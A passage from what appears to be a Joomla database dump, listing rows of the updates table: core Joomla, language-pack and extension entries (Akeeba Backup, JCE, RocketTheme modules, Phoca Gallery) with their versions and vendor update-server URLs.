Unitag','','pkg_ar-AA','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(30186,3,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(30187,3,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(30188,3,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.28.2','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(30189,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.10.1.2','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(30190,3,0,'Danish','','pkg_da-DK','package','',0,'3.10.1.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(30191,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.10.1.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(30192,3,0,'Estonian','','pkg_et-EE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(30193,3,0,'Italian','','pkg_it-IT','package','',0,'3.10.1.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(30194,3,0,'Latvian','','pkg_lv-LV','package','',0,'3.9.25.2','','https://update.joomla.org/language/details3/lv-LV_details.xml','',''),(30195,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(30196,3,0,'Norwegian Bokmal','','pkg_nb-NO','package','',0,'3.10.0.1','','https://update.joomla.org/language/details3/nb-NO_details.xml','',''),(30197,3,0,'Persian','','pkg_fa-IR','package','',0,'3.10.1.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(30198,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(30199,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.29.2','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(30200,3,0,'Russian','','pkg_ru-RU','package','',0,'3.10.0.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(30201,3,0,'English AU','','pkg_en-AU','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(30202,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(30203,3,0,'English US','','pkg_en-US','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(30204,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.10.1.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(30205,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.10.1.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(30206,3,0,'Thai','','pkg_th-TH','package','',0,'3.10.1.2','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(30207,3,0,'Turkish','','pkg_tr-TR','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/tr-TR_details.xml','',''),(30208,3,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.10.1.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(30209,3,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(30210,3,0,'Basque','','pkg_eu-ES','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/eu-ES_details.xml','',''),(30211,3,0,'German DE','','pkg_de-DE','package','',0,'3.10.1.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(30212,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(30213,3,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.10.1.2','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(30214,3,0,'Spanish','','pkg_es-ES','package','',0,'3.10.1.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(30215,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(30216,3,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.10.1.2','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(30217,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(30218,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(30219,3,0,'English CA','','pkg_en-CA','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(30220,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.10.1.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(30221,3,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(30222,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.10.1.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(30223,3,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(30224,3,0,'German CH','','pkg_de-CH','package','',0,'3.10.1.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(30225,3,0,'German AT','','pkg_de-AT','package','',0,'3.10.1.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(30226,3,0,'German LI','','pkg_de-LI','package','',0,'3.10.1.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(30227,3,0,'German LU','','pkg_de-LU','package','',0,'3.10.1.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(30228,3,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(30229,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(30230,1,0,'Joomla','','joomla','file','',0,'3.10.1','','https://update.joomla.org/core/extension.xml','',''),(30231,20,0,'RokSprocket Module','','mod_roksprocket','module','',0,'2.1.28','0802','https://updates.rockettheme.com/joomla/138/b61e70db','',''),(30232,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','https://updates.rockettheme.com/joomla/138/2084920890','',''),(30233,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.46','0802','https://updates.rockettheme.com/joomla/286/21ffe006','',''),(30234,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','https://updates.rockettheme.com/joomla/286/326466299','',''),(30235,20,0,'RokBooster Plugin','','rokbooster','plugin','system',0,'1.1.19','0802','https://updates.rockettheme.com/joomla/287/cb577720','',''),(30236,20,0,'RokBox Plugin','','rokbox','plugin','system',0,'2.0.16','0802','https://updates.rockettheme.com/joomla/301/dfc993d8','',''),(30237,20,0,'RokCandy Extension','','rokcandy','plugin','system',0,'2.0.4','0802','https://updates.rockettheme.com/joomla/302/2df8a4e2','',''),(30238,20,0,'RokGallery','','','component','',0,'2.46','0802','https://updates.rockettheme.com/joomla/313/1985305838','',''),(30239,20,0,'RokWeather','','','module','',0,'2.0.4','0802','https://updates.rockettheme.com/joomla/313/1307741342','',''),(30240,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','https://updates.rockettheme.com/joomla/313/1301311221','',''),(30241,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','https://updates.rockettheme.com/joomla/381/337128173','',''),(30242,20,0,'RokCommon','','pkg_rokcommon','package','',0,'3.2.9','0802','https://updates.rockettheme.com/joomla/559/1033ef39','',''),(30243,31,0,'Regular Labs - Modules Anywhere','','modulesanywhere','plugin','system',0,'7.13.5','','https://download.regularlabs.com/updates.xml?e=modulesanywhere&type=.xml','https://www.regularlabs.com/modulesanywhere/download',''),(30244,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.10.1.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(30245,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.10.1.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(30246,57,0,'French','','pkg_fr-FR','package','',0,'3.10.1.4','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(30247,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.10.1.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(30248,57,0,'Greek','','pkg_el-GR','package','',0,'3.10.0.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(30249,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.10.1.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(30250,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.10.1.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(30251,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(30252,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(30253,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(30254,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(30255,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.28.2','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(30256,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.10.1.2','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(30257,57,0,'Danish','','pkg_da-DK','package','',0,'3.10.1.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(30258,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.10.1.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(30259,57,0,'Estonian','','pkg_et-EE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(30260,57,0,'Italian','','pkg_it-IT','package','',0,'3.10.1.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(30261,57,0,'Latvian','','pkg_lv-LV','package','',0,'3.9.25.2','','https://update.joomla.org/language/details3/lv-LV_details.xml','',''),(30262,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(30263,57,0,'Norwegian Bokmal','','pkg_nb-NO','package','',0,'3.10.0.1','','https://update.joomla.org/language/details3/nb-NO_details.xml','',''),(30264,57,0,'Persian','','pkg_fa-IR','package','',0,'3.10.1.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(30265,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(30266,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.29.2','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(30267,57,0,'Russian','','pkg_ru-RU','package','',0,'3.10.0.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(30268,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(30269,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(30270,57,0,'English US','','pkg_en-US','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(30271,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.10.1.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(30272,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.10.1.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(30273,57,0,'Thai','','pkg_th-TH','package','',0,'3.10.1.2','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(30274,57,0,'Turkish','','pkg_tr-TR','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/tr-TR_details.xml','',''),(30275,57,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.10.1.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(30276,57,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(30277,57,0,'Basque','','pkg_eu-ES','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/eu-ES_details.xml','',''),(30278,57,0,'German DE','','pkg_de-DE','package','',0,'3.10.1.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(30279,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(30280,57,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.10.1.2','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(30281,57,0,'Spanish','','pkg_es-ES','package','',0,'3.10.1.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(30282,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(30283,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.10.1.2','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(30284,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(30285,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(30286,57,0,'English CA','','pkg_en-CA','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(30287,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.10.1.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(30288,57,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(30289,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.10.1.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(30290,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(30291,57,0,'German CH','','pkg_de-CH','package','',0,'3.10.1.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(30292,57,0,'German AT','','pkg_de-AT','package','',0,'3.10.1.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(30293,57,0,'German LI','','pkg_de-LI','package','',0,'3.10.1.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(30294,57,0,'German LU','','pkg_de-LU','package','',0,'3.10.1.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(30295,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(30296,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(30297,93,0,'Regular Labs - Sourcerer','','sourcerer','plugin','system',0,'9.0.1','','https://download.regularlabs.com/updates.xml?e=sourcerer&type=.xml','https://www.regularlabs.com/sourcerer/download',''),(30298,122,0,'Google Structured Data Free','Google Structured Data Free','gsd','plugin','system',0,'5.0.0','','https://static.tassos.gr/update/gsdfree?type=.xml','\n			https://www.tassos.gr/releases/google-structured-data-markup/google-structured-data-markup-5-0-0			\n		',''),(30299,129,0,'JCE 2.9.14','Installation package for Joomla! 3.x and 4.x','pkg_jce','package','',0,'2.9.14','','https://cdn.joomlacontenteditor.net/updates/xml/editor/pkg_jce.xml','https://www.joomlacontenteditor.net/news/jce-pro-2-9-14-released',''),(30300,130,0,'T3 System Plugin','','t3','plugin','system',0,'3.0.3','','http://update.joomlart.com/service/tracking/j16/plg_system_t3.xml','http://www.joomlart.com/update-steps',''),(30301,135,0,' Phoca Gallery ',' Phoca Gallery is an efficient image gallery extension for Joomla! CMS. ','com_phocagallery','component','',1,'4.4.3','','https://raw.githubusercontent.com/PhocaCz/PhocaGallery/master/manifest.xml','http://www.phoca.cz/version/index.php?phocagallery=4.4.3',''),(30302,1,0,'Joomla','','joomla','file','',0,'3.10.1','','https://update.joomla.org/core/extension.xml','',''),(30303,1,0,'Joomla','','joomla','file','',0,'3.10.1','','https://update.joomla.org/core/extension.xml','',''),(30304,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.10','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-10.html',''),(30305,1,0,'Joomla','','joomla','file','',0,'3.10.1','','https://update.joomla.org/core/extension.xml','',''),(30306,1,0,'Joomla','','joomla','file','',0,'3.10.1','','https://update.joomla.org/core/extension.xml','',''),(30307,1,0,'Joomla','','joomla','file','',0,'3.10.1','','https://update.joomla.org/core/extension.xml','',''),(30308,1,0,'Joomla','','joomla','file','',0,'3.10.2','','https://update.joomla.org/core/extension.xml','',''),(30309,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.10','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-10.html',''),(30310,1,0,'Joomla','','joomla','file','',0,'3.10.2','','https://update.joomla.org/core/extension.xml','',''),(30311,1,0,'Joomla','','joomla','file','',0,'3.10.2','','https://update.joomla.org/core/extension.xml','',''),(30312,1,0,'Joomla','','joomla','file','',0,'3.10.2','','https://update.joomla.org/core/extension.xml','',''),(30313,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.10','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-10.html',''),(30314,1,0,'Joomla','','joomla','file','',0,'3.10.2','','https://update.joomla.org/core/extension.xml','',''),(30315,1,0,'Joomla','','joomla','file','',0,'3.10.2','','https://update.joomla.org/core/extension.xml','',''),(30316,1,0,'Joomla','','joomla','file','',0,'3.10.2','','https://update.joomla.org/core/extension.xml','',''),(30317,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.10','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-10.html',''),(30318,1,0,'Joomla','','joomla','file','',0,'3.10.2','','https://update.joomla.org/core/extension.xml','',''),(30319,1,0,'Joomla','','joomla','file','',0,'3.10.2','','https://update.joomla.org/core/extension.xml','',''),(30320,1,0,'Joomla','','joomla','file','',0,'3.10.2','','https://update.joomla.org/core/extension.xml','',''),(30321,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.10','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-10.html',''),(30322,1,0,'Joomla','','joomla','file','',0,'3.10.2','','https://update.joomla.org/core/extension.xml','',''),(30323,1,0,'Joomla','','joomla','file','',0,'3.10.2','','https://update.joomla.org/core/extension.xml','',''),(30324,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.10','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-10.html',''),(30325,1,0,'Joomla','','joomla','file','',0,'3.10.2','','https://update.joomla.org/core/extension.xml','',''),(30326,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.10','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-10.html',''),(30327,1,0,'Joomla','','joomla','file','',0,'3.10.2','','https://update.joomla.org/core/extension.xml','',''),(30328,1,0,'Joomla','','joomla','file','',0,'3.10.2','','https://update.joomla.org/core/extension.xml','',''),(30329,1,0,'Joomla','','joomla','file','',0,'3.10.2','','https://update.joomla.org/core/extension.xml','',''),(30330,1,0,'Joomla','','joomla','file','',0,'3.10.2','','https://update.joomla.org/core/extension.xml','',''),(30331,1,0,'Joomla','','joomla','file','',0,'3.10.2','','https://update.joomla.org/core/extension.xml','',''),(30332,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.10','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-10.html',''),(30333,1,0,'Joomla','','joomla','file','',0,'3.10.2','','https://update.joomla.org/core/extension.xml','',''),(30334,1,0,'Joomla','','joomla','file','',0,'3.10.2','','https://update.joomla.org/core/extension.xml','',''),(30335,1,0,'Joomla','','joomla','file','',0,'3.10.2','','https://update.joomla.org/core/extension.xml','',''),(30336,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.10','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-10.html',''),(30337,1,0,'Joomla','','joomla','file','',0,'3.10.2','','https://update.joomla.org/core/extension.xml','',''),(30338,1,0,'Joomla','','joomla','file','',0,'3.10.2','','https://update.joomla.org/core/extension.xml','',''),(30339,1,0,'Joomla','','joomla','file','',0,'3.10.2','','https://update.joomla.org/core/extension.xml','',''),(30340,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.10','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-10.html',''),(30341,1,0,'Joomla','','joomla','file','',0,'3.10.2','','https://update.joomla.org/core/extension.xml','',''),(30342,1,0,'Joomla','','joomla','file','',0,'3.10.2','','https://update.joomla.org/core/extension.xml','',''),(30343,1,0,'Joomla','','joomla','file','',0,'3.10.2','','https://update.joomla.org/core/extension.xml','',''),(30344,1,0,'Joomla','','joomla','file','',0,'3.10.2','','https://update.joomla.org/core/extension.xml','',''),(30345,1,0,'Joomla','','joomla','file','',0,'3.10.2','','https://update.joomla.org/core/extension.xml','',''),(30346,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.10','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-10.html',''),(30347,1,0,'Joomla','','joomla','file','',0,'3.10.2','','https://update.joomla.org/core/extension.xml','',''),(30348,1,0,'Joomla','','joomla','file','',0,'3.10.2','','https://update.joomla.org/core/extension.xml','',''),(30349,1,0,'Joomla','','joomla','file','',0,'3.10.2','','https://update.joomla.org/core/extension.xml','',''),(30350,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.10','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-10.html',''),(30351,1,0,'Joomla','','joomla','file','',0,'3.10.2','','https://update.joomla.org/core/extension.xml','',''),(30352,1,0,'Joomla','','joomla','file','',0,'3.10.2','','https://update.joomla.org/core/extension.xml','',''),(30353,1,0,'Joomla','','joomla','file','',0,'3.10.2','','https://update.joomla.org/core/extension.xml','',''),(30354,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.11','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-11.html',''),(30355,1,0,'Joomla','','joomla','file','',0,'3.10.2','','https://update.joomla.org/core/extension.xml','',''),(30356,1,0,'Joomla','','joomla','file','',0,'3.10.2','','https://update.joomla.org/core/extension.xml','',''),(30357,1,0,'Joomla','','joomla','file','',0,'3.10.2','','https://update.joomla.org/core/extension.xml','',''),(30358,1,0,'Joomla','','joomla','file','',0,'3.10.2','','https://update.joomla.org/core/extension.xml','',''),(30359,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.11','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-11.html',''),(30360,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.10.1.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(30361,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.10.2.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(30362,3,0,'Italian','','pkg_it-IT','package','',0,'3.10.2.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(30363,3,0,'French','','pkg_fr-FR','package','',0,'3.10.2.2','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(30364,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.10.2.2','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(30365,3,0,'Greek','','pkg_el-GR','package','',0,'3.10.2.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(30366,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.10.2.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(30367,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.10.1.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(30368,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(30369,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(30370,3,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(30371,3,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(30372,3,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.28.2','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(30373,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.10.2.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(30374,3,0,'Danish','','pkg_da-DK','package','',0,'3.10.2.2','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(30375,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.10.2.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(30376,3,0,'Estonian','','pkg_et-EE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(30377,3,0,'Latvian','','pkg_lv-LV','package','',0,'3.9.25.2','','https://update.joomla.org/language/details3/lv-LV_details.xml','',''),(30378,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(30379,3,0,'Norwegian Bokmal','','pkg_nb-NO','package','',0,'3.10.0.1','','https://update.joomla.org/language/details3/nb-NO_details.xml','',''),(30380,3,0,'Persian','','pkg_fa-IR','package','',0,'3.10.2.2','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(30381,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(30382,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.29.2','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(30383,3,0,'Russian','','pkg_ru-RU','package','',0,'3.10.0.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(30384,3,0,'English AU','','pkg_en-AU','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(30385,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.10.2.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(30386,3,0,'English US','','pkg_en-US','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(30387,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.10.1.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(30388,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.10.2.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(30389,3,0,'Thai','','pkg_th-TH','package','',0,'3.10.2.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(30390,3,0,'Turkish','','pkg_tr-TR','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/tr-TR_details.xml','',''),(30391,3,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.10.2.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(30392,3,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(30393,3,0,'Basque','','pkg_eu-ES','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/eu-ES_details.xml','',''),(30394,3,0,'German DE','','pkg_de-DE','package','',0,'3.10.2.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(30395,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(30396,3,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.10.2.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(30397,3,0,'Spanish','','pkg_es-ES','package','',0,'3.10.2.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(30398,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(30399,3,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.10.2.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(30400,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(30401,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(30402,3,0,'English 